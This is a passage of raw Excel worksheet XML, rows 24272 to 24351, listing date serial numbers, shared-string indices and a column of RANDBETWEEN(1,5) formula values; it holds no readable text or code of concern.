        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24272" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24272" s="1">
        <v>42992.506342592591</v>
      </c>
      <c r="C24272" t="s">
        <v>41</v>
      </c>
      <c r="E24272" t="s">
        <v>21990</v>
      </c>
      <c r="F24272">
        <f t="shared" ca="1" si="379"/>
        <v>1</v>
      </c>
    </row>
    <row r="24273" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24273" s="1">
        <v>42992.496932870374</v>
      </c>
      <c r="C24273" t="s">
        <v>10</v>
      </c>
      <c r="D24273" t="s">
        <v>1056</v>
      </c>
      <c r="E24273" t="s">
        <v>21991</v>
      </c>
      <c r="F24273">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24274" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24274" s="1">
        <v>42992.480092592596</v>
      </c>
      <c r="C24274" t="s">
        <v>10</v>
      </c>
      <c r="D24274" t="s">
        <v>14</v>
      </c>
      <c r="E24274" t="s">
        <v>21992</v>
      </c>
      <c r="F24274">
        <f t="shared" ca="1" si="379"/>
        <v>1</v>
      </c>
    </row>
    <row r="24275" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24275" s="1">
        <v>42992.476481481484</v>
      </c>
      <c r="C24275" t="s">
        <v>10</v>
      </c>
      <c r="D24275" t="s">
        <v>494</v>
      </c>
      <c r="E24275" t="s">
        <v>21993</v>
      </c>
      <c r="F24275">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24276" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24276" s="1">
        <v>42992.465208333335</v>
      </c>
      <c r="C24276" t="s">
        <v>10</v>
      </c>
      <c r="D24276" t="s">
        <v>107</v>
      </c>
      <c r="E24276" t="s">
        <v>21994</v>
      </c>
      <c r="F24276">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24277" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24277" s="1">
        <v>42992.465196759258</v>
      </c>
      <c r="C24277" t="s">
        <v>10375</v>
      </c>
      <c r="E24277" t="s">
        <v>21995</v>
      </c>
      <c r="F24277">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24278" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24278" s="1">
        <v>42992.448379629626</v>
      </c>
      <c r="C24278" t="s">
        <v>10</v>
      </c>
      <c r="D24278" t="s">
        <v>17</v>
      </c>
      <c r="E24278" s="2" t="s">
        <v>21996</v>
      </c>
      <c r="F24278">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24279" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24279" s="1">
        <v>42992.406898148147</v>
      </c>
      <c r="C24279" t="s">
        <v>6</v>
      </c>
      <c r="D24279" t="s">
        <v>25</v>
      </c>
      <c r="E24279" t="s">
        <v>21997</v>
      </c>
      <c r="F24279">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24280" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24280" s="1">
        <v>42992.39135416667</v>
      </c>
      <c r="C24280" t="s">
        <v>6</v>
      </c>
      <c r="D24280" t="s">
        <v>25</v>
      </c>
      <c r="E24280" t="s">
        <v>21998</v>
      </c>
      <c r="F24280">
        <f t="shared" ca="1" si="379"/>
        <v>5</v>
      </c>
    </row>
    <row r="24281" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24281" s="1">
        <v>42992.382141203707</v>
      </c>
      <c r="C24281" t="s">
        <v>41</v>
      </c>
      <c r="E24281" t="s">
        <v>21999</v>
      </c>
      <c r="F24281">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24282" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24282" s="1">
        <v>42992.364340277774</v>
      </c>
      <c r="C24282" t="s">
        <v>173</v>
      </c>
      <c r="E24282" t="s">
        <v>22000</v>
      </c>
      <c r="F24282">
        <f t="shared" ca="1" si="379"/>
        <v>1</v>
      </c>
    </row>
    <row r="24283" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24283" s="1">
        <v>42992.357592592591</v>
      </c>
      <c r="C24283" t="s">
        <v>6</v>
      </c>
      <c r="D24283" t="s">
        <v>25</v>
      </c>
      <c r="E24283" s="2" t="s">
        <v>22001</v>
      </c>
      <c r="F24283">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24284" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24284" s="1">
        <v>42992.329259259262</v>
      </c>
      <c r="C24284" t="s">
        <v>10</v>
      </c>
      <c r="D24284" t="s">
        <v>17</v>
      </c>
      <c r="E24284" t="s">
        <v>22002</v>
      </c>
      <c r="F24284">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24285" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A24285" s="1">
        <v>42992.235775462963</v>
      </c>
      <c r="C24285" t="s">
        <v>43</v>
      </c>
      <c r="E24285" s="2" t="s">
        <v>22003</v>
      </c>
      <c r="F24285">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24286" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24286" s="1">
        <v>42992.214699074073</v>
      </c>
      <c r="C24286" t="s">
        <v>41</v>
      </c>
      <c r="E24286" t="s">
        <v>22004</v>
      </c>
      <c r="F24286">
        <f t="shared" ca="1" si="379"/>
        <v>3</v>
      </c>
    </row>
    <row r="24287" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24287" s="1">
        <v>42992.201793981483</v>
      </c>
      <c r="C24287" t="s">
        <v>686</v>
      </c>
      <c r="D24287" t="s">
        <v>312</v>
      </c>
      <c r="E24287" t="s">
        <v>22005</v>
      </c>
      <c r="F24287">
        <f t="shared" ca="1" si="379"/>
        <v>3</v>
      </c>
    </row>
    <row r="24288" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24288" s="1">
        <v>42992.173611111109</v>
      </c>
      <c r="C24288" t="s">
        <v>71</v>
      </c>
      <c r="E24288" s="2" t="s">
        <v>22006</v>
      </c>
      <c r="F24288">
        <f t="shared" ca="1" si="379"/>
        <v>1</v>
      </c>
    </row>
    <row r="24289" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A24289" s="1">
        <v>42992.172233796293</v>
      </c>
      <c r="C24289" t="s">
        <v>71</v>
      </c>
      <c r="E24289" s="2" t="s">
        <v>22007</v>
      </c>
      <c r="F24289">
        <f t="shared" ca="1" si="379"/>
        <v>1</v>
      </c>
    </row>
    <row r="24290" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24290" s="1">
        <v>42992.170069444444</v>
      </c>
      <c r="C24290" t="s">
        <v>41</v>
      </c>
      <c r="E24290" s="2" t="s">
        <v>22008</v>
      </c>
      <c r="F24290">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24291" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24291" s="1">
        <v>42992.150335648148</v>
      </c>
      <c r="C24291" t="s">
        <v>43</v>
      </c>
      <c r="E24291" s="2" t="s">
        <v>22009</v>
      </c>
      <c r="F24291">
        <f t="shared" ca="1" si="379"/>
        <v>3</v>
      </c>
    </row>
    <row r="24292" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A24292" s="1">
        <v>42992.147615740738</v>
      </c>
      <c r="C24292" t="s">
        <v>65</v>
      </c>
      <c r="E24292" s="2" t="s">
        <v>22010</v>
      </c>
      <c r="F24292">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24293" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24293" s="1">
        <v>42992.142685185187</v>
      </c>
      <c r="C24293" t="s">
        <v>50</v>
      </c>
      <c r="E24293" s="2" t="s">
        <v>22011</v>
      </c>
      <c r="F24293">
        <f t="shared" ca="1" si="379"/>
        <v>1</v>
      </c>
    </row>
    <row r="24294" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24294" s="1">
        <v>42992.133206018516</v>
      </c>
      <c r="C24294" t="s">
        <v>140</v>
      </c>
      <c r="D24294" t="s">
        <v>46</v>
      </c>
      <c r="F24294">
        <f t="shared" ca="1" si="379"/>
        <v>1</v>
      </c>
    </row>
    <row r="24295" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24295" s="1">
        <v>42992.105092592596</v>
      </c>
      <c r="C24295" t="s">
        <v>318</v>
      </c>
      <c r="E24295" s="2" t="s">
        <v>22012</v>
      </c>
      <c r="F24295">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24296" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24296" s="1">
        <v>42992.086064814815</v>
      </c>
      <c r="C24296" t="s">
        <v>6</v>
      </c>
      <c r="D24296" t="s">
        <v>25</v>
      </c>
      <c r="F24296">
        <f t="shared" ca="1" si="379"/>
        <v>3</v>
      </c>
    </row>
    <row r="24297" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24297" s="1">
        <v>42992.082395833335</v>
      </c>
      <c r="C24297" t="s">
        <v>776</v>
      </c>
      <c r="E24297" s="2" t="s">
        <v>22013</v>
      </c>
      <c r="F24297">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24298" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24298" s="1">
        <v>42992.044699074075</v>
      </c>
      <c r="C24298" t="s">
        <v>41</v>
      </c>
      <c r="E24298" s="2" t="s">
        <v>22014</v>
      </c>
      <c r="F24298">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24299" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24299" s="1">
        <v>42992.016828703701</v>
      </c>
      <c r="C24299" t="s">
        <v>41</v>
      </c>
      <c r="E24299" t="s">
        <v>22015</v>
      </c>
      <c r="F24299">
        <f t="shared" ca="1" si="379"/>
        <v>1</v>
      </c>
    </row>
    <row r="24300" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A24300" s="1">
        <v>42991.934282407405</v>
      </c>
      <c r="C24300" t="s">
        <v>10</v>
      </c>
      <c r="D24300" t="s">
        <v>17</v>
      </c>
      <c r="E24300" s="2" t="s">
        <v>22016</v>
      </c>
      <c r="F24300">
        <f t="shared" ca="1" si="379"/>
        <v>3</v>
      </c>
    </row>
    <row r="24301" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24301" s="1">
        <v>42991.888391203705</v>
      </c>
      <c r="C24301" t="s">
        <v>410</v>
      </c>
      <c r="E24301" t="s">
        <v>22017</v>
      </c>
      <c r="F24301">
        <f t="shared" ca="1" si="379"/>
        <v>3</v>
      </c>
    </row>
    <row r="24302" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24302" s="1">
        <v>42991.839201388888</v>
      </c>
      <c r="C24302" t="s">
        <v>6</v>
      </c>
      <c r="D24302" t="s">
        <v>821</v>
      </c>
      <c r="E24302" t="s">
        <v>22018</v>
      </c>
      <c r="F24302">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24303" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24303" s="1">
        <v>42991.731030092589</v>
      </c>
      <c r="C24303" t="s">
        <v>10</v>
      </c>
      <c r="D24303" t="s">
        <v>80</v>
      </c>
      <c r="E24303" t="s">
        <v>22019</v>
      </c>
      <c r="F24303">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24304" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24304" s="1">
        <v>42991.707337962966</v>
      </c>
      <c r="C24304" t="s">
        <v>10</v>
      </c>
      <c r="D24304" t="s">
        <v>11</v>
      </c>
      <c r="E24304" t="s">
        <v>22020</v>
      </c>
      <c r="F24304">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24305" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24305" s="1">
        <v>42991.691423611112</v>
      </c>
      <c r="C24305" t="s">
        <v>10</v>
      </c>
      <c r="D24305" t="s">
        <v>263</v>
      </c>
      <c r="E24305" t="s">
        <v>22021</v>
      </c>
      <c r="F24305">
        <f t="shared" ca="1" si="379"/>
        <v>3</v>
      </c>
    </row>
    <row r="24306" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24306" s="1">
        <v>42991.661134259259</v>
      </c>
      <c r="C24306" t="s">
        <v>173</v>
      </c>
      <c r="E24306" s="2" t="s">
        <v>22022</v>
      </c>
      <c r="F24306">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24307" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24307" s="1">
        <v>42991.619143518517</v>
      </c>
      <c r="C24307" t="s">
        <v>6</v>
      </c>
      <c r="D24307" t="s">
        <v>25</v>
      </c>
      <c r="E24307" t="s">
        <v>22023</v>
      </c>
      <c r="F24307">
        <f t="shared" ca="1" si="379"/>
        <v>3</v>
      </c>
    </row>
    <row r="24308" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A24308" s="1">
        <v>42991.585138888891</v>
      </c>
      <c r="C24308" t="s">
        <v>10</v>
      </c>
      <c r="D24308" t="s">
        <v>6</v>
      </c>
      <c r="E24308" s="2" t="s">
        <v>22024</v>
      </c>
      <c r="F24308">
        <f t="shared" ca="1" si="379"/>
        <v>1</v>
      </c>
    </row>
    <row r="24309" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24309" s="1">
        <v>42991.575231481482</v>
      </c>
      <c r="C24309" t="s">
        <v>10</v>
      </c>
      <c r="D24309" t="s">
        <v>20</v>
      </c>
      <c r="E24309" t="s">
        <v>22025</v>
      </c>
      <c r="F24309">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24310" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24310" s="1">
        <v>42991.565671296295</v>
      </c>
      <c r="C24310" t="s">
        <v>10</v>
      </c>
      <c r="D24310" t="s">
        <v>20</v>
      </c>
      <c r="E24310" t="s">
        <v>22026</v>
      </c>
      <c r="F24310">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24311" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24311" s="1">
        <v>42991.556539351855</v>
      </c>
      <c r="C24311" t="s">
        <v>41</v>
      </c>
      <c r="E24311" t="s">
        <v>22027</v>
      </c>
      <c r="F24311">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24312" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24312" s="1">
        <v>42991.555763888886</v>
      </c>
      <c r="C24312" t="s">
        <v>10</v>
      </c>
      <c r="D24312" t="s">
        <v>6</v>
      </c>
      <c r="E24312" t="s">
        <v>22028</v>
      </c>
      <c r="F24312">
        <f t="shared" ca="1" si="379"/>
        <v>5</v>
      </c>
    </row>
    <row r="24313" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24313" s="1">
        <v>42991.535937499997</v>
      </c>
      <c r="C24313" t="s">
        <v>10</v>
      </c>
      <c r="D24313" t="s">
        <v>17</v>
      </c>
      <c r="E24313" t="s">
        <v>22029</v>
      </c>
      <c r="F24313">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24314" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24314" s="1">
        <v>42991.534988425927</v>
      </c>
      <c r="C24314" t="s">
        <v>10</v>
      </c>
      <c r="D24314" t="s">
        <v>330</v>
      </c>
      <c r="E24314" t="s">
        <v>22030</v>
      </c>
      <c r="F24314">
        <f t="shared" ca="1" si="379"/>
        <v>5</v>
      </c>
    </row>
    <row r="24315" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A24315" s="1">
        <v>42991.533750000002</v>
      </c>
      <c r="C24315" t="s">
        <v>10</v>
      </c>
      <c r="D24315" t="s">
        <v>89</v>
      </c>
      <c r="E24315" s="2" t="s">
        <v>22031</v>
      </c>
      <c r="F24315">
        <f t="shared" ca="1" si="379"/>
        <v>3</v>
      </c>
    </row>
    <row r="24316" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24316" s="1">
        <v>42991.524178240739</v>
      </c>
      <c r="C24316" t="s">
        <v>10</v>
      </c>
      <c r="D24316" t="s">
        <v>14</v>
      </c>
      <c r="E24316" t="s">
        <v>22032</v>
      </c>
      <c r="F24316">
        <f t="shared" ca="1" si="379"/>
        <v>3</v>
      </c>
    </row>
    <row r="24317" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24317" s="1">
        <v>42991.523796296293</v>
      </c>
      <c r="C24317" t="s">
        <v>10</v>
      </c>
      <c r="D24317" t="s">
        <v>89</v>
      </c>
      <c r="E24317" t="s">
        <v>22033</v>
      </c>
      <c r="F24317">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24318" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24318" s="1">
        <v>42991.515416666669</v>
      </c>
      <c r="C24318" t="s">
        <v>173</v>
      </c>
      <c r="E24318" s="2" t="s">
        <v>22034</v>
      </c>
      <c r="F24318">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24319" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24319" s="1">
        <v>42991.513807870368</v>
      </c>
      <c r="C24319" t="s">
        <v>10</v>
      </c>
      <c r="D24319" t="s">
        <v>6</v>
      </c>
      <c r="E24319" t="s">
        <v>22035</v>
      </c>
      <c r="F24319">
        <f t="shared" ca="1" si="379"/>
        <v>1</v>
      </c>
    </row>
    <row r="24320" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24320" s="1">
        <v>42991.501620370371</v>
      </c>
      <c r="C24320" t="s">
        <v>10</v>
      </c>
      <c r="D24320" t="s">
        <v>330</v>
      </c>
      <c r="E24320" t="s">
        <v>22036</v>
      </c>
      <c r="F24320">
        <f t="shared" ca="1" si="379"/>
        <v>1</v>
      </c>
    </row>
    <row r="24321" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24321" s="1">
        <v>42991.491076388891</v>
      </c>
      <c r="C24321" t="s">
        <v>280</v>
      </c>
      <c r="E24321" s="2" t="s">
        <v>22037</v>
      </c>
      <c r="F24321">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24322" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A24322" s="1">
        <v>42991.485729166663</v>
      </c>
      <c r="C24322" t="s">
        <v>6</v>
      </c>
      <c r="D24322" t="s">
        <v>25</v>
      </c>
      <c r="E24322" s="2" t="s">
        <v>22038</v>
      </c>
      <c r="F24322">
        <f t="shared" ref="F24322:F24385" ca="1" si="380">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="24323" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24323" s="1">
        <v>42991.477581018517</v>
      </c>
      <c r="C24323" t="s">
        <v>10</v>
      </c>
      <c r="D24323" t="s">
        <v>6</v>
      </c>
      <c r="E24323" t="s">
        <v>22039</v>
      </c>
      <c r="F24323">
        <f t="shared" ca="1" si="380"/>
        <v>5</v>
      </c>
    </row>
    <row r="24324" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A24324" s="1">
        <v>42991.470277777778</v>
      </c>
      <c r="C24324" t="s">
        <v>71</v>
      </c>
      <c r="E24324" s="2" t="s">
        <v>22040</v>
      </c>
      <c r="F24324">
        <f t="shared" ca="1" si="380"/>
        <v>5</v>
      </c>
    </row>
    <row r="24325" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24325" s="1">
        <v>42991.446435185186</v>
      </c>
      <c r="C24325" t="s">
        <v>10</v>
      </c>
      <c r="D24325" t="s">
        <v>46</v>
      </c>
      <c r="E24325" t="s">
        <v>22041</v>
      </c>
      <c r="F24325">
        <f t="shared" ca="1" si="380"/>
        <v>5</v>
      </c>
    </row>
    <row r="24326" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24326" s="1">
        <v>42991.431655092594</v>
      </c>
      <c r="C24326" t="s">
        <v>60</v>
      </c>
      <c r="E24326" t="s">
        <v>22042</v>
      </c>
      <c r="F24326">
        <f t="shared" ca="1" si="380"/>
        <v>1</v>
      </c>
    </row>
    <row r="24327" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24327" s="1">
        <v>42991.417812500003</v>
      </c>
      <c r="C24327" t="s">
        <v>41</v>
      </c>
      <c r="E24327" t="s">
        <v>22043</v>
      </c>
      <c r="F24327">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24328" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24328" s="1">
        <v>42991.407673611109</v>
      </c>
      <c r="C24328" t="s">
        <v>454</v>
      </c>
      <c r="E24328" s="2" t="s">
        <v>22044</v>
      </c>
      <c r="F24328">
        <f t="shared" ca="1" si="380"/>
        <v>3</v>
      </c>
    </row>
    <row r="24329" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24329" s="1">
        <v>42991.397847222222</v>
      </c>
      <c r="C24329" t="s">
        <v>318</v>
      </c>
      <c r="E24329" s="2" t="s">
        <v>22045</v>
      </c>
      <c r="F24329">
        <f t="shared" ca="1" si="380"/>
        <v>5</v>
      </c>
    </row>
    <row r="24330" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24330" s="1">
        <v>42991.37</v>
      </c>
      <c r="C24330" t="s">
        <v>6</v>
      </c>
      <c r="D24330" t="s">
        <v>25</v>
      </c>
      <c r="E24330" s="2" t="s">
        <v>22046</v>
      </c>
      <c r="F24330">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24331" s="1">
        <v>42991.354502314818</v>
      </c>
      <c r="C24331" t="s">
        <v>10</v>
      </c>
      <c r="D24331" t="s">
        <v>163</v>
      </c>
      <c r="E24331" t="s">
        <v>22047</v>
      </c>
      <c r="F24331">
        <f t="shared" ca="1" si="380"/>
        <v>5</v>
      </c>
    </row>
    <row r="24332" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24332" s="1">
        <v>42991.353784722225</v>
      </c>
      <c r="C24332" t="s">
        <v>173</v>
      </c>
      <c r="E24332" t="s">
        <v>22048</v>
      </c>
      <c r="F24332">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24333" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24333" s="1">
        <v>42991.288298611114</v>
      </c>
      <c r="C24333" t="s">
        <v>50</v>
      </c>
      <c r="E24333" s="2" t="s">
        <v>22049</v>
      </c>
      <c r="F24333">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24334" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24334" s="1">
        <v>42991.269270833334</v>
      </c>
      <c r="C24334" t="s">
        <v>41</v>
      </c>
      <c r="E24334" t="s">
        <v>22050</v>
      </c>
      <c r="F24334">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24335" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24335" s="1">
        <v>42991.236608796295</v>
      </c>
      <c r="C24335" t="s">
        <v>48</v>
      </c>
      <c r="E24335" s="2" t="s">
        <v>22051</v>
      </c>
      <c r="F24335">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24336" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24336" s="1">
        <v>42991.220694444448</v>
      </c>
      <c r="C24336" t="s">
        <v>48</v>
      </c>
      <c r="E24336" s="2" t="s">
        <v>22052</v>
      </c>
      <c r="F24336">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24337" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A24337" s="1">
        <v>42991.203587962962</v>
      </c>
      <c r="C24337" t="s">
        <v>10</v>
      </c>
      <c r="D24337" t="s">
        <v>158</v>
      </c>
      <c r="E24337" s="2" t="s">
        <v>22053</v>
      </c>
      <c r="F24337">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24338" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A24338" s="1">
        <v>42991.202743055554</v>
      </c>
      <c r="C24338" t="s">
        <v>48</v>
      </c>
      <c r="E24338" s="2" t="s">
        <v>22054</v>
      </c>
      <c r="F24338">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24339" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24339" s="1">
        <v>42991.191180555557</v>
      </c>
      <c r="C24339" t="s">
        <v>10</v>
      </c>
      <c r="D24339" t="s">
        <v>1091</v>
      </c>
      <c r="E24339" t="s">
        <v>22055</v>
      </c>
      <c r="F24339">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24340" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24340" s="1">
        <v>42991.187395833331</v>
      </c>
      <c r="C24340" t="s">
        <v>41</v>
      </c>
      <c r="E24340" t="s">
        <v>22056</v>
      </c>
      <c r="F24340">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24341" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24341" s="1">
        <v>42991.053564814814</v>
      </c>
      <c r="C24341" t="s">
        <v>144</v>
      </c>
      <c r="E24341" t="s">
        <v>22057</v>
      </c>
      <c r="F24341">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24342" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24342" s="1">
        <v>42991.038483796299</v>
      </c>
      <c r="C24342" t="s">
        <v>41</v>
      </c>
      <c r="E24342" t="s">
        <v>22058</v>
      </c>
      <c r="F24342">
        <f t="shared" ca="1" si="380"/>
        <v>3</v>
      </c>
    </row>
    <row r="24343" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24343" s="1">
        <v>42990.938032407408</v>
      </c>
      <c r="C24343" t="s">
        <v>10</v>
      </c>
      <c r="D24343" t="s">
        <v>151</v>
      </c>
      <c r="E24343" s="2" t="s">
        <v>22059</v>
      </c>
      <c r="F24343">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24344" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24344" s="1">
        <v>42990.936076388891</v>
      </c>
      <c r="C24344" t="s">
        <v>10</v>
      </c>
      <c r="D24344" t="s">
        <v>192</v>
      </c>
      <c r="E24344" t="s">
        <v>22060</v>
      </c>
      <c r="F24344">
        <f t="shared" ca="1" si="380"/>
        <v>1</v>
      </c>
    </row>
    <row r="24345" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24345" s="1">
        <v>42990.899328703701</v>
      </c>
      <c r="C24345" t="s">
        <v>253</v>
      </c>
      <c r="E24345" t="s">
        <v>22061</v>
      </c>
      <c r="F24345">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24346" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24346" s="1">
        <v>42990.888321759259</v>
      </c>
      <c r="C24346" t="s">
        <v>144</v>
      </c>
      <c r="E24346" t="s">
        <v>22062</v>
      </c>
      <c r="F24346">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24347" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24347" s="1">
        <v>42990.878807870373</v>
      </c>
      <c r="C24347" t="s">
        <v>118</v>
      </c>
      <c r="E24347" s="2" t="s">
        <v>22063</v>
      </c>
      <c r="F24347">
        <f t="shared" ca="1" si="380"/>
        <v>3</v>
      </c>
    </row>
    <row r="24348" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24348" s="1">
        <v>42990.837743055556</v>
      </c>
      <c r="C24348" t="s">
        <v>10</v>
      </c>
      <c r="D24348" t="s">
        <v>6</v>
      </c>
      <c r="E24348" t="s">
        <v>22064</v>
      </c>
      <c r="F24348">
        <f t="shared" ca="1" si="380"/>
        <v>5</v>
      </c>
    </row>
    <row r="24349" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24349" s="1">
        <v>42990.795092592591</v>
      </c>
      <c r="C24349" t="s">
        <v>10</v>
      </c>
      <c r="D24349" t="s">
        <v>56</v>
      </c>
      <c r="E24349" t="s">
        <v>22065</v>
      </c>
      <c r="F24349">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24350" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24350" s="1">
        <v>42990.780648148146</v>
      </c>
      <c r="C24350" t="s">
        <v>6</v>
      </c>
      <c r="D24350" t="s">
        <v>25</v>
      </c>
      <c r="E24350" t="s">
        <v>22066</v>
      </c>
      <c r="F24350">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24351" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A24351" s="1">
